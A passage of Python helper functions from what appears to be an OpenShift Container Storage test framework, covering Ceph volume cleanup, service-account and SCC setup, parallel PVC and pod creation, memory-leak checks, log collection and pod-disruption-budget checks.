f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): The of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
# Incase image is present delete
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directories names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case Memory leak is
analyzed based on top output "RES" value of ceph-osd daemon, i.e.
``list[7]`` in code.
More Detail on Median value: For calculating memory leak require a constant
value, which should not be start or end of test, so calculating it by
getting memory for 180 sec before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name("dummy", "osd")
osd_data["metadata"]["name"] = dummy_deployment
osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
# get osd container spec
original_osd_args = osd_containers[0].get("args")
osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
"/bin/bash",
"-c",
"sleep infinity",
]
osd_file = tempfile.NamedTemporaryFile(
mode="w+", prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
)
ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
try:
logger.info("Following command should expire after 7 seconds")
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info("Killing /rook/tini process")
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of cluster
CPU, memory consumption of each nodes
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Validate pod oomkilled message are found on log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
Assertion if failed to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
Validate given pod is in running state and not restarted or re-spinned
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Arguments:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get Pv names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
Args:
exp_val(float): Expected size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
def get_full_test_logs_path(cname):
"""
Getting the full path of the logs file for particular test
this function use the inspect module to find the name of the caller function, so it need
to be call once from the main test function.
the output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
# the full log path (relative to ocs-ci base path)
full_log_path = (
f"{ocsci_log_path()}/{log_file_name}/{mname}/{inspect.stack()[1][3]}"
)
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
max_unavailable_mon (int): Count of maximun mon unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
return:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logging.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
